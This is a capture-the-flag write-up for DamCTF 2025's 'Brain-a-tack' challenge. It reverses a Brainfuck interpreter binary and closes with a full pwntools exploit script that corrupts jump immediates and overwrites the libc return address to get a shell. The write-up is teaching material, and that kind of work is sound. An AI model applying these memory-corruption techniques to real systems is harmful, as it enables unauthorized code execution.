Brain-a-tack - DamCTF 2025

May 12, 2025

Brain-a-tack was a fun challenge I up-solved from DamCTF, involving reversing and then pwning a Brainfuck program.

We are given a stripped x86 binary bf and a bf program in the challenge description, which I believe was updated during the event for clarity.

server is running ./bf ”>,[[>],[<]>-]-[>]-[<.+]++++++++++.”

[*] '/home/gray/ctf/events/damctf25/bf'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled

Cool, we all love esolangs… right?

Opening up the challenge in a disassembler and looking at the main function we see some state setup, then two important function calls helpfully renamed by me to spoil their functionality.

__int64 __fastcall main(int argc, char **argv, char **a3)
{
  int compile_len; // [rsp+Ch] [rbp-3B4h]
  _BYTE input_str[140]; // [rsp+20h] [rbp-3A0h] BYREF
  _DWORD s[35]; // [rsp+ACh] [rbp-314h] BYREF
  state bf_state; // [rsp+138h] [rbp-288h] BYREF
  unsigned __int64 canary; // [rsp+3B8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  if ( argc >= 2 )
  {
    if ( (unsigned int)__isoc99_sscanf(argv[1], "%127s", input_str) == 1 )
    {
      zero_out_state(&bf_state);
      memset(s, 0, 0x80u);
      s[32] = 0;
      s[33] = 0;
      s[34] = 0;
      null_check_memcpy(&bf_state, s);
      compile_len = check_null_compile_bytecode((__int64)&bf_state, (__int64)input_str);
      if ( compile_len >= 0 )
        return (unsigned int)execute_bytecode((__int64)&bf_state, s);
      else
        return (unsigned int)compile_len;
    }
    else
    {
      return (unsigned int)-1;
    }
  }
  else
  {
    return 0;
  }
}

We see that it reads in input from argv[1] onto a buffer, then passes that to the compile step along with a pointer to state helpfully labeled.

This state structure looks like

struct bf_state // sizeof=0x280
{
    char data[128];
    uint32_t bytecode[127];
    uint16_t mp;
    int16_t ip;
};

The data section being before the bytecode will be helpful later…

Here’s the compile step disassembly nicely labeled:

__int64 __fastcall compile_bytecode(uint32_t *bytecode, char *input_program, __int64 start_pc, int depth)
{
  __int64 v6; // [rsp+20h] [rbp-40h]
  unsigned __int16 loop_ret_idx; // [rsp+28h] [rbp-38h]
  __int64 pc; // [rsp+38h] [rbp-28h]

  pc = start_pc;
  loop_ret_idx = start_pc;
  while ( input_program[pc] )
  {
    switch ( input_program[pc] )
    {
      case '+':
        bytecode[pc] = bytecode[pc] & 0xFFFFFF00 | 5;
        ++pc;
        continue;
      case ',':
        bytecode[pc] = bytecode[pc] & 0xFFFFFF00 | 4;
        ++pc;
        continue;
      case '-':
        bytecode[pc] = bytecode[pc] & 0xFFFFFF00 | 6;
        ++pc;
        continue;
      case '.':
        bytecode[pc] = bytecode[pc] & 0xFFFFFF00 | 3;
        ++pc;
        continue;
      case '<':
        bytecode[pc] = bytecode[pc] & 0xFFFFFF00 | 2;
        ++pc;
        continue;
      case '>':
        bytecode[pc] = bytecode[pc] & 0xFFFFFF00 | 1;
        ++pc;
        continue;
      case '[':
        bytecode[pc] = bytecode[pc] & 0xFFFFFF00 | 7;
        v6 = compile_bytecode(bytecode, input_program, pc + 1, depth + 1);
        if ( !v6 )
          return 0;
        bytecode[pc] = ((unsigned __int16)v6 << 16) | (unsigned __int16)bytecode[pc];
        pc = v6;
        break;
      case ']':
        if ( !depth )
          return 0;
        bytecode[pc] = bytecode[pc] & 0xFFFFFF00 | 8;
        bytecode[pc] = (loop_ret_idx << 16) | (unsigned __int16)bytecode[pc];
        return pc + 1;
      default:
        return 0;
    }
  }
  if ( depth )
    return 0;
  else
    return pc;
}

Looking at the case statement we can see the pretty straight forward translation from chars to a 32-bit bytecode representation of the program. We see that the opcode is contained in the LSB of the 32bit instruction, and for the brackets we encode the potential jump offset as a 16 bit immediate in the upper 2 bytes recuring on the compile step to properly handle return indexes.

Here’s a little table of the translation to op-codes

| char | opcode |
| ---- | ----- |
|  +   |   5   |
|  ,   |   4   |
|  -   |   6   |
|  .   |   3   |
|  <   |   2   |
|  >   |   1   |
|  [   |   7   |
|  ]   |   8   |

Encoding:
LSB               MSB
0 .. 8 .. 16 .... 32
[ op | xx | imm16 ]

Onto executing the bytecode, things are mostly standard, with some extra debugging statements left in by the author.

__int64 __fastcall execute_bytecode(bf_state *state, _DWORD *a2)
{
  int v3; // [rsp+Ch] [rbp-24h]

  if ( state )
  {
    if ( a2 )
      null_check_memcpy(state, a2);
    v3 = 0;
    while ( state->ip < 127 )
    {
      if ( a2[32] && !(v3 % a2[33]) )
      {
        dbg_print(state);
        fflush(stderr);
      }
      if ( a2[34] )
        fprintf(stderr, "(ip=%hu, mp=%hu)\n", state->ip, (unsigned __int16)state->mp);
      execute_instruction(state);
      ++v3;
    }
    if ( a2[32] )
    {
      dbg_print(state);
      fflush(stderr);
    }
    return 0;
  }
  else
  {
    return (unsigned int)-1;
  }
}

unsigned __int64 __fastcall execute_instruction(bf_state *a1)
{
  uint32_t v2; // [rsp+14h] [rbp-Ch]

  v2 = a1->bytecode[a1->ip];
  switch ( (char)v2 )
  {
    case 0:
      ++a1->ip;
      break;
    case 1:
      ++a1->mp;
      ++a1->ip;
      break;
    case 2:
      --a1->mp;
      ++a1->ip;
      break;
    case 3:
      putchar(a1->data[(unsigned __int16)a1->mp]);
      fflush(stdout);
      ++a1->ip;
      break;
    case 4:
      a1->data[(unsigned __int16)a1->mp] = getchar();
      fflush(stdout);
      ++a1->ip;
      break;
    case 5:
      ++a1->data[(unsigned __int16)a1->mp];
      ++a1->ip;
      break;
    case 6:
      --a1->data[(unsigned __int16)a1->mp];
      ++a1->ip;
      break;
    case 7:
      if ( a1->data[(unsigned __int16)a1->mp] )
        ++a1->ip;
      else
        a1->ip = HIWORD(v2);
      break;
    case 8:
      if ( a1->data[(unsigned __int16)a1->mp] )
        a1->ip = HIWORD(v2);
      else
        ++a1->ip;
      break;
    default:
      ++a1->ip;
      break;
  }
  return __readfsqword(0x28u);
}

Off the bat nothing is bounds checked, which is great for vm pwning, the parsing of op codes is also interesting, it only looks at the lowest byte, which is helpful, and the instruction pointer is signed, allowing us to potentially index negatively into the data region.

Ok, we could have assumed that the program did all this given the name, what are we trying to pwn here? Well, we don’t give it a bf program, instead we are provided one that the server is running, and we have to interface with that to pwn that program.

So, what does this >,[[>],[<]>-]-[>]-[<.+]++++++++++. do?

Here’s my breakdown splitting it out and commenting sections

0: > # mp++
1: , # state[mp] = input char
# read in data loop
2: [  
     3: [>] # go to next 0 
     4: ,   # state[mp] = input char
     5: [<] # go back to beginning 0
     6: >   # mp++
     7: -   # state[mp] -= 1
8: ]


9: -      # dec @ inst counter? underflow -> 0xff?
10: [>]   # go to end of input
11: -     # dec
12: [<.+] # for each input byte d: print(d); d++
13: ++++++++++. # mp += 10; output char

So in the first part lines 0 & 1 we read in a value that functions as our ‘input length’, then in lines 2-8 we go back and forth in the memory region reading in characters until we decrement our input length cell to zero.

We then decrement again, go to the end of our input, decrement the last value, then go backwards printing out our input, ending with the final zero being incremented to 10 (ascii newline) then output with ., and our program terminating.

Looking at the state, we have 0x80 bytes of data, then our instructions, this means we can give a input > 0x80, and start writing in the instruction region. But our program will only let us overwrite null bytes, not existing opcodes.

So we can’t start directly overwriting instruction opcodes, but as we keep overwriting null bytes between instructions we will begin to overwrite the \x00 bytes of the imm16 values in the [] instructions.

A important detail from the vm implementation is that the instruction pointer is a signed int16_t, so if we write a value like 0xFF with the highest bit set, we will change the immediate jump from a positive to a negative offset.

So up to this point is we give 0x80 bytes of input filling up the data region, then start overwriting gaps in the instructions until we hit the immediate field of a paren. We then overwrite the null byte so that the jump taken sets the instruction pointer to a negative value, where does this land us?

The bracket we will first overwrite is the first ], it has a value of 4 initially, or \x04\x00, and we overwrite the null byte to \x04\xFF, which as a little-endian value is 0xFF04 or -252. This is a bit unfortunate as our 0x80 bytes of data before the instructions amount to 32 instructions in the negative direction, setting our jump to -252 means that we will jump far behind our data region.

In practice though, we get lucky, most of the values on the stack won’t be valid opcodes, since only 1-8 are valid out of 0-255 possible values and the vm will ignore them, as it iterates from -252 up to -32 running back into our input data. It does introduces unreliability to our exploit though if any of them are valid, but the odds are pretty low (roughly 2/3’rds from my local testing).

Now that we have gotten the bytecode interpreters instruction pointer to hit our input data, we have 31 instructions worth of space we can use to exploit the program.

Given our payload has to be the strange brainfuck encoded instructions I figured the easiest path was to encode a program that would iterate up to the libc return address of main, and modify the bytes to return to a libc one gadget.

this looks something like <<[>>>>,]>>>>>>>>>>>>>>>>,>.,>.,

we align our pointer after our vm hits the data section to 4 bytes, then we iterate every 4 bytes taking input, if its non-null we loop again, otherwise we then break and iterate 16 forward, write one value, then for the next two indexes output a byte then write a byte.

This maps to writing over every 4 bytes till we hit the canary, we hit the lsb of the canary which should be null, so we write null, then increment to the return pointer which is 0x10 away, and overwrite the bottom 3 bytes. We output the top two bytes to allow our overwrite to accommodate for PIE in the libc address.

Here’s my final exploit script cleaned up :)

#!/usr/bin/env python3
from pwn import *

exe = context.binary = ELF(args.EXE or 'bf_remotelibc')

gdbscript = '''
breakrva 0x1500
breakrva 0x164e  
continue
'''.format(**locals())

prog = ">,[[>],[<]>-]-[>]-[<.+]++++++++++."

io = process([exe.path, prog])
# io = gdb.debug([exe.path, prog], gdbscript=gdbscript)
# io = remote("brain-a-tac.chals.damctf.xyz", 31337)

DEC_MP = b"\x02\xFF\xFF\xFF"
INC_MP = b"\x01\xFF\xFF\xFF"
INP_CH = b"\x04\xFF\xFF\xFF"
OUT_CH = b"\x03\xFF\xFF\xFF"
RB_JMP = lambda x: b"\x08\xff" + p16(x, "little", sign=True)

payload = b"\xFF" * 2 # pad

# starting state ip = -31, mp = 2
# move left to align to 4 bytes
payload += DEC_MP # -31 : < 
payload += DEC_MP # -30 : < 

# 29-26: 4 >> right
payload += INC_MP * 4

# input, loop if != 0
payload += INP_CH      # -25: take input
payload += RB_JMP(-29) # -24: jump -29 if != 0

# at this point we are @ canary, move 16 to get to libc_start_main return pointer
payload += INC_MP * 16 # -23-8: >

# LSB, known value overwrite
payload += INP_CH  # -7: LSB of libc ret addr

# calc offset
payload += INC_MP # -6
payload += OUT_CH # -5
payload += INP_CH # -4
# x2 for 2n'd byte
payload += INC_MP # -3
payload += OUT_CH # -2
payload += INP_CH # -1

# get every 4'th byte to avoid breaking our bf payload while running as we overwrite
part2 = bytes(payload[2:][::4]) 
part2 += b"\xFF"* 0x7f  # overwrite inital program with invalid instructions to NOP
part2 += b"\x7c"        # handle overwriting MP pointer data during loop with correct value
part2 += b"\x00"        # input nop value for LSB of Canary

# section for overwriting instructions
payload += b"A" * 0x8 # upto 2nd [
payload += b"B" * 5
payload += b"C" * 1 
payload += b"\xFF" # negative loop on 3:, sets jump to -252
payload = bytes([len(payload) + 2]) + payload # add 'input len' byte

io.send(payload + part2)

# current libc return address offset 0x2a3b8 
# target offset 0xf6292

# send lsb, since not subject to PIE
io.send(b"\x92")

# recieve byte, calc offset, set value 
b = io.recv(1)
print("lb1:", b, nxt := (b[0] - 0xa3 + 0x62) % 256)
io.send(nxt.to_bytes())

# rinse and repeat
b = io.recv(1)
print("lb2:", b, nxt := (b[0] - 0x2 + 0xf) % 256)
io.send(nxt.to_bytes())

# are we shell yet?
io.interactive()

Overall a fun challenge handling the collision of instruction pointer and memory pointer… something something code is data… brainfuck truly is a great functional language /s